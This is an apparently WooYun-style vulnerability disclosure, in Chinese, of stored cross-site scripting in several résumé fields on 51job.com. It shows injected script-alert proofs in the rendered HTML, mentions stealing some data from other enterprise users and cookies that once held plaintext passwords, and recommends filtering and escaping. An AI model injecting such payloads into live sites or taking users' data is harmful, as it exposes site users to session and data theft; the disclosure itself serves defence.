简要描述:51job.com个人简历多地方存储型XSS,导致可以获得企业用户访问的一些信息,因为申请企业用户需要验证,就没有测试。
但是获取了别的企业用户的一点信息。
详细说明:插入的。
漏洞 证明:
<td id="Cur_Val" valign="top"><script>alert("自我评价跨站")</script></td>
<td id="Cur_Val" colspan="2" valign="top"><script>alert("工作描述跨站")</script></td>
<td width="84%" id="Cur_Val" valign="top"><script>alert("项目描述跨站")</script></td>
<td id="Cur_Val" valign="top"><script>alert("责任描述跨站")</script></td>
<td id="Cur_Val" colspan="4" valign="top" height="30"><script>alert("专业描述跨站")</script></td>
<td width="86%" id="Cur_Val"><script>alert("内容跨站")</script></td>
完全木有过滤什么的。只要你插。
下面是偷的一点点东西。。
不确定为什么偷不到其他的信息。
前些天的cookie里面都有明文密码的。
现在没了。
修复方案:过滤,转义。
作者 Tea@乌云
查看更多关于51job.com个人简历多地方存储型XSS及修复 - 网站安的详细内容...